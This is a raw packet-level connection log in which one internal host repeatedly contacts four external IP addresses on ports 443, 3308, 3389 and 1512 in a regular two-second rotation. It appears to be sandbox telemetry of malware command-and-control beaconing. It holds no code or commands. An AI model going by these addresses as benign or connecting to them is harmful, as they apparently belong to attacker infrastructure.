Jan 12, 2021 07:40:24.468655109 CET	443	49224	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:24.586888075 CET	443	49224	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:24.586918116 CET	443	49224	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:24.587111950 CET	49224	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:24.592355013 CET	49224	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:24.644398928 CET	443	49224	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:24.702857971 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:24.745970964 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:24.746293068 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:24.747950077 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:24.791064978 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:24.802850008 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:24.802894115 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:24.803013086 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:24.815458059 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:24.860308886 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:24.860446930 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:24.870331049 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:24.870693922 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:24.913913012 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:24.914180994 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:24.954011917 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:24.957515955 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:25.070403099 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:25.070449114 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:25.070687056 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:25.076364040 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:25.119612932 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:25.186503887 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:25.240945101 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:25.241158009 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:25.242680073 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:25.299154043 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:25.323113918 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:25.323163986 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:25.323319912 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:25.337595940 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:25.404555082 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:25.404906988 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:25.416146994 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:25.416414976 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:25.470592022 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:25.470917940 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:25.510596037 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:25.525646925 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:25.525690079 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:25.615838051 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:25.615880013 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:25.616077900 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:25.616131067 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:25.621680021 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:25.676434040 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:25.731990099 CET	49227	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:25.785016060 CET	1512	49227	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:25.785113096 CET	49227	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:25.786463976 CET	49227	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:25.839390039 CET	1512	49227	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:25.846445084 CET	1512	49227	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:25.846493006 CET	1512	49227	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:25.846559048 CET	49227	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:25.847472906 CET	49227	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:25.862457991 CET	49227	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:25.916631937 CET	1512	49227	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:25.916718006 CET	49227	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:25.922780991 CET	49227	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:25.922981024 CET	49227	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:25.975912094 CET	1512	49227	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:25.976021051 CET	49227	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:26.013155937 CET	1512	49227	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:26.028800964 CET	1512	49227	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:26.128985882 CET	1512	49227	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:26.129014969 CET	1512	49227	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:26.129154921 CET	49227	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:26.132164001 CET	49227	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:26.185323000 CET	1512	49227	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:26.242815018 CET	49228	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:26.295258045 CET	443	49228	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:26.295366049 CET	49228	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:26.296236992 CET	49228	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:26.348381996 CET	443	49228	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:26.363502026 CET	443	49228	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:26.363740921 CET	49228	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:26.380151987 CET	49228	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:26.434691906 CET	443	49228	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:26.434891939 CET	49228	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:26.577259064 CET	49228	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:26.577364922 CET	49228	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:26.629707098 CET	443	49228	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:26.629890919 CET	49228	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:26.682003975 CET	443	49228	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:26.801301956 CET	443	49228	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:26.801328897 CET	443	49228	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:26.801481009 CET	49228	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:26.801557064 CET	49228	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:26.807548046 CET	49228	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:26.859781981 CET	443	49228	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:26.913669109 CET	49229	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:26.956989050 CET	3308	49229	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:26.957078934 CET	49229	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:26.957844019 CET	49229	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:27.000729084 CET	3308	49229	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:27.014090061 CET	3308	49229	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:27.014120102 CET	3308	49229	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:27.014195919 CET	49229	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:27.234673023 CET	49229	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:27.280522108 CET	3308	49229	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:27.280622959 CET	49229	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:27.293360949 CET	49229	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:27.293528080 CET	49229	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:27.336504936 CET	3308	49229	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:27.336641073 CET	49229	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:27.377774954 CET	3308	49229	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:27.379822969 CET	3308	49229	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:27.379834890 CET	3308	49229	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:27.493230104 CET	3308	49229	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:27.493253946 CET	3308	49229	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:27.493424892 CET	49229	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:27.499095917 CET	49229	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:27.542135000 CET	3308	49229	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:27.794929981 CET	49230	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:27.848854065 CET	3389	49230	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:27.848954916 CET	49230	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:27.850351095 CET	49230	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:27.904479980 CET	3389	49230	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:27.920635939 CET	3389	49230	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:27.920653105 CET	3389	49230	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:27.920777082 CET	49230	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:28.103041887 CET	49230	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:28.166243076 CET	3389	49230	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:28.166438103 CET	49230	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:29.150794983 CET	49230	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:29.150913000 CET	49230	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:29.206501961 CET	3389	49230	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:29.206604958 CET	49230	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:29.246423006 CET	3389	49230	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:29.262849092 CET	3389	49230	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:29.262867928 CET	3389	49230	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:29.353504896 CET	3389	49230	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:29.353528023 CET	3389	49230	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:29.353678942 CET	49230	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:29.355814934 CET	49230	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:29.409627914 CET	3389	49230	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:29.477364063 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:29.530441999 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:29.530535936 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:29.531404972 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:29.584378004 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:29.591229916 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:29.591248035 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:29.591315031 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:29.599917889 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:29.653985977 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:29.654170990 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:29.659188032 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:29.659327984 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:29.712327003 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:29.712469101 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:29.749090910 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:29.765609980 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:29.869849920 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:29.869877100 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:29.869956970 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:29.870006084 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:29.875967026 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:29.929053068 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:29.991776943 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:30.044596910 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:30.044811964 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:30.046462059 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:30.098509073 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:30.113729954 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:30.113974094 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:30.128156900 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:30.182673931 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:30.182831049 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:30.193182945 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:30.193387032 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:30.245477915 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:30.245595932 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:30.297830105 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:30.297852039 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:30.416893959 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:30.416913986 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:30.417006969 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:30.417042971 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:30.421044111 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:30.473192930 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:30.538233042 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:30.581345081 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:30.581590891 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:30.582561016 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:30.625555992 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:30.636404991 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:30.636424065 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:30.636490107 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:30.648454905 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:30.693280935 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:30.693377018 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:30.698064089 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:30.698210955 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:30.741233110 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:30.741365910 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:30.781994104 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:30.784384012 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:30.896929979 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:30.896946907 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:30.897010088 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:30.902925014 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:30.945944071 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:31.021771908 CET	49236	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:31.075238943 CET	3389	49236	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:31.075319052 CET	49236	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:31.076082945 CET	49236	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:31.129829884 CET	3389	49236	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:31.158374071 CET	3389	49236	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:31.158395052 CET	3389	49236	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:31.158462048 CET	49236	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:31.163429976 CET	49236	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:31.222887039 CET	3389	49236	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:31.223016977 CET	49236	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:31.469014883 CET	49236	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:31.469057083 CET	49236	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:31.524118900 CET	3389	49236	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:31.524219990 CET	49236	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:31.562298059 CET	3389	49236	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:31.578063011 CET	3389	49236	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:31.578121901 CET	3389	49236	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:31.669442892 CET	3389	49236	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:31.669495106 CET	3389	49236	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:31.669540882 CET	49236	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:31.669564009 CET	49236	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:31.673413038 CET	49236	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:31.727128029 CET	3389	49236	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:31.790884018 CET	49237	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:31.843921900 CET	1512	49237	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:31.843996048 CET	49237	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:31.844774961 CET	49237	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:31.897934914 CET	1512	49237	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:31.904418945 CET	1512	49237	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:31.904438019 CET	1512	49237	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:31.904511929 CET	49237	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:31.913639069 CET	49237	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:31.967987061 CET	1512	49237	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:31.968125105 CET	49237	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:32.022540092 CET	49237	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:32.022900105 CET	49237	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:32.075756073 CET	1512	49237	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:32.075850964 CET	49237	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:32.113249063 CET	1512	49237	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:32.129004002 CET	1512	49237	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:32.227101088 CET	1512	49237	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:32.227158070 CET	1512	49237	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:32.227305889 CET	49237	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:32.233405113 CET	49237	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:32.286572933 CET	1512	49237	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:32.342264891 CET	49238	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:32.394371033 CET	443	49238	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:32.394489050 CET	49238	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:32.395868063 CET	49238	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:32.447659016 CET	443	49238	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:32.462321043 CET	443	49238	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:32.462399006 CET	49238	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:32.476182938 CET	49238	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:32.530529022 CET	443	49238	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:32.530658007 CET	49238	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:32.536680937 CET	49238	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:32.536938906 CET	49238	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:32.588839054 CET	443	49238	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:32.592122078 CET	49238	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:32.644064903 CET	443	49238	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:32.764236927 CET	443	49238	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:32.764257908 CET	443	49238	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:32.764394045 CET	49238	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:32.767710924 CET	49238	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:32.819485903 CET	443	49238	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:32.872917891 CET	49239	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:32.916394949 CET	3308	49239	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:32.916493893 CET	49239	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:32.917800903 CET	49239	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:32.961091042 CET	3308	49239	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:32.977617979 CET	3308	49239	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:32.977650881 CET	3308	49239	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:32.977752924 CET	49239	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:32.991782904 CET	49239	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:33.037734032 CET	3308	49239	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:33.037878990 CET	49239	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:33.044109106 CET	49239	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:33.044353962 CET	49239	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:33.087428093 CET	3308	49239	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:33.087697029 CET	49239	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:33.126966000 CET	3308	49239	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:33.130839109 CET	3308	49239	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:33.130872965 CET	3308	49239	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:33.245733976 CET	3308	49239	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:33.245889902 CET	3308	49239	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:33.245994091 CET	49239	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:33.251476049 CET	49239	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:33.251687050 CET	49239	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:33.295586109 CET	3308	49239	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:33.360764027 CET	49240	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:33.414887905 CET	3389	49240	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:33.415064096 CET	49240	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:33.416631937 CET	49240	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:33.470971107 CET	3389	49240	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:33.493844032 CET	3389	49240	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:33.493891001 CET	3389	49240	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:33.494215012 CET	49240	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:33.506412029 CET	49240	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:33.571465015 CET	3389	49240	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:33.571759939 CET	49240	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:33.587795973 CET	49240	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:33.587918043 CET	49240	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:33.641583920 CET	3389	49240	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:33.641724110 CET	49240	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:33.681092024 CET	3389	49240	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:33.695453882 CET	3389	49240	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:33.695507050 CET	3389	49240	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:33.786724091 CET	3389	49240	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:33.786765099 CET	3389	49240	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:33.787827015 CET	49240	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:33.787856102 CET	49240	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:33.793651104 CET	49240	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:33.847430944 CET	3389	49240	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:33.905567884 CET	49241	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:33.958512068 CET	1512	49241	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:33.958620071 CET	49241	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:33.959805965 CET	49241	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:34.012541056 CET	1512	49241	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:34.019525051 CET	1512	49241	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:34.019553900 CET	1512	49241	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:34.019638062 CET	49241	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:34.034137011 CET	49241	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:34.088094950 CET	1512	49241	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:34.088340044 CET	49241	1512	192.168.2.22	46.105.131.65
